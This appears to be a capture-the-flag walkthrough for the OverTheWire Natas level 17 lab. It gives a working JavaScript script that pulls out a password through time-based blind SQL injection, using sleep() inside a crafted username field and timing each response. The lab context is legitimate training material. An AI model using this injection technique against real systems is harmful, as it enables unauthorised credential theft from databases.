Our username check is back, and this time it’s not telling us anything:
It looks like they forgot to uncomment all the messages before they published this file. That’s ok, we can take the same strategy as the other blind sql level, and use an if statement combined with the sleep() function to tell us if we have the correct character. In the code below, execution will be halted for two seconds if we have the correct character. We time the length of execution, if it is greater than 2000 milliseconds (2 seconds) we know we have the right character and move on to the next index:
var start = new Date().getTime();
var end = new Date().getTime();
string = "";
for (j = 1; j < 33; j++) {
for(i = 48; i < 123; i++) { //123
if (i > 57 && i < 65) { continue; }
if (i > 90 && i < 97) { continue; }
query = 'username=natas18" and if(binary(SUBSTRING(password,' + j + ', 1)) = "' + String.fromCharCode(i) + '", sleep(2), 0) and "1" = "1';
start = new Date().getTime(); //start timing
xhr = new XMLHttpRequest();
xhr.open("POST", "http://natas17.natas.labs.overthewire.org/index.php", false);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xhr.send(query);
console.log(query);
console.log(string);
end = new Date().getTime(); //end timing
if (end - start > 2000) {
console.log(String.fromCharCode(i));
//console.log(xhr.response);
string += String.fromCharCode(i);
break;
}
}
}
console.log(string);
You may have to increase the sleep time if your internet connection is slow:
